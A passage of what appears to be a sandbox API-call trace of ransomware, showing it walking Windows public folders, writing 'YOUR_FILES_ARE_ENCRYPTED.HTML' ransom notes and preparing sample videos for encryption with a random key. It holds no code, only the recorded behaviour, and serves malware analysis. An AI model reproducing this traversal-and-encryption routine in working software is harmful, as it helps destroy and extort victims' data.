ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0171.846] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV") returned 31 [0171.846] GetProcessHeap () returned 0x270000 [0171.846] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0171.847] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV") returned="\\\\?\\C:\\Users\\Public\\Recorded TV" [0171.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\*" [0171.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, 
cFileName="..", cAlternateFileName="")) returned 1 [0171.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbbbe3c8e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbbbe3c8e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.847] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0171.847] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.847] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.847] lstrlenW (lpString=".ini") returned 4 [0171.847] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0171.848] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned 44 [0171.848] GetProcessHeap () returned 0x270000 [0171.848] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.848] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" | out: 
lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" [0171.848] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*" [0171.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.848] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.848] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbc330fc8, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbc330fc8, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.848] wnsprintfW (in: 
pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0171.848] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.848] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.848] lstrlenW (lpString=".ini") returned 4 [0171.849] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.849] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbc330fc8, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbc330fc8, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x60, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0171.849] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0171.849] lstrcmpW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.849] PathFindExtensionW (pszPath="win7_scenic-demoshort_raw.wtv") returned=".wtv" [0171.849] lstrlenW (lpString=".wtv") returned 4 [0171.849] PathFindExtensionW (pszPath="win7_scenic-demoshort_raw.wtv") returned=".wtv" [0171.849] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbc330fc8, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbc330fc8, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0171.849] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.849] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0171.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\recorded tv\\sample media\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.852] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.854] CloseHandle (hObject=0x5f8) returned 1 [0171.854] GetProcessHeap () returned 0x270000 [0171.854] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.854] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0171.854] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.855] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0171.855] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\recorded tv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.860] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.862] CloseHandle (hObject=0x5a0) returned 1 [0171.862] GetProcessHeap () returned 0x270000 [0171.863] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0171.863] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 1 [0171.863] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos") returned 26 [0171.863] GetProcessHeap () returned 0x270000 [0171.863] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0171.863] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Public\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos") returned="\\\\?\\C:\\Users\\Public\\Videos" [0171.863] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Videos\\*" [0171.863] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.863] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.864] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b38bbf8, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.864] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0171.864] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.864] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.864] lstrlenW (lpString=".ini") returned 4 [0171.864] PathFindExtensionW (pszPath="desktop.ini") 
returned=".ini" [0171.864] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0171.864] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned 40 [0171.864] GetProcessHeap () returned 0x270000 [0171.864] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.864] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" [0171.864] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*" [0171.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.865] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0171.865] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.865] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.865] lstrlenW (lpString=".ini") returned 4 [0171.865] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1c496c1, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x60, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0171.865] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0171.865] lstrcmpW (lpString1="Wildlife.wmv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.865] PathFindExtensionW (pszPath="Wildlife.wmv") returned=".wmv" [0171.865] lstrlenW (lpString=".wmv") returned 4 [0171.865] PathFindExtensionW (pszPath="Wildlife.wmv") returned=".wmv" [0171.865] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0171.866] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=26246026) returned 1 [0171.866] GetProcessHeap () returned 0x270000 [0171.866] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a700 [0171.868] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="51") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AA") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D5") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="19") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="F9") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EB") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="2E") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="5C") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0B") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda5a, 
param_2="%02X" | out: param_1="1A") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="06") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="02") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="58") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A5") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="CB") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="55") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="67") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="8B") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5C") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="71") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1F") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2F") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5B") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="8C") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3F") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="88") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B3") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="65") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="84") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="08") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="6C") returned 2 [0171.870] wsprintfW 
(in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7B") returned 2 [0171.870] lstrcpyW (in: lpString1=0x756a7b4, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" [0171.870] CreateIoCompletionPort (FileHandle=0x5f4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a700, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.870] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a700, lpOverlapped=0x755a700) returned 1 [0171.870] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1c496c1, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x60, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0171.870] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.871] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0171.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\videos\\sample videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.871] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.873] CloseHandle (hObject=0x5f8) returned 1 [0171.873] GetProcessHeap () returned 0x270000 [0171.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.874] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0171.874] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.874] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0171.874] CreateFileW 